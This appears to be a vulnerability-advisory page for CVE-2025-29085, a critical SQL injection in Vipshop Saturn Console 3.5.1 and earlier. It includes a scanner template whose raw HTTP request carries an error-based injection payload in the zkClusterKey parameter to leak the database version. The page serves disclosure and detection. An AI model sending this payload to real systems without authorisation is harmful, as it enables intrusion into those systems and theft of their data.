漏洞描述
SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via /console/dashboard/executorCount?zkClusterKey component.
CVE-2025-29085: Vipshop Saturn Console <= 3.5.1 - SQL Injection via ClusterKey Component
PoC代码[已公开]
id: CVE-2025-29085
info:
name: Vipshop Saturn Console <= 3.5.1 - SQL Injection via ClusterKey Component
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via /console/dashboard/executorCount?zkClusterKey component.
reference:
- https://github.com/advisories/GHSA-49v8-p6mm-3pfj
- https://gist.github.com/Cafe-Tea/bcef0d7a2bdb5ec8e0d69de852fdc900
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-29085
cwe-id: CWE-89
epss-score: 0.04135
epss-percentile: 0.88143
metadata:
verified: true
tags: cve,cve2025,vipshop,sqli,vkev,vuln
http:
- raw:
- |
GET /console/dashboard/executorCount?zkClusterKey=1%27-extractvalue(1,concat(0x0a,version()))--%20- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "java.sql.SQLException: XPATH syntax error: '"
extractors:
- type: regex
part: body
internal: true
name: version
group: 1
regex:
- "XPATH syntax error: '\\\\n(.*?)'"
- type: dsl
dsl:
- '"Database Version: " + version'
# digest: 490a004630440220632bea9179867a6de3d635672cec7705bdc242fb15d305bea04e74cdb89c3bef02204737a6c8fe3116c810356b1d27c955a2c5772d03b556ab36262dea32d81a78ce:922c64590222798bb761d5b6d8e72950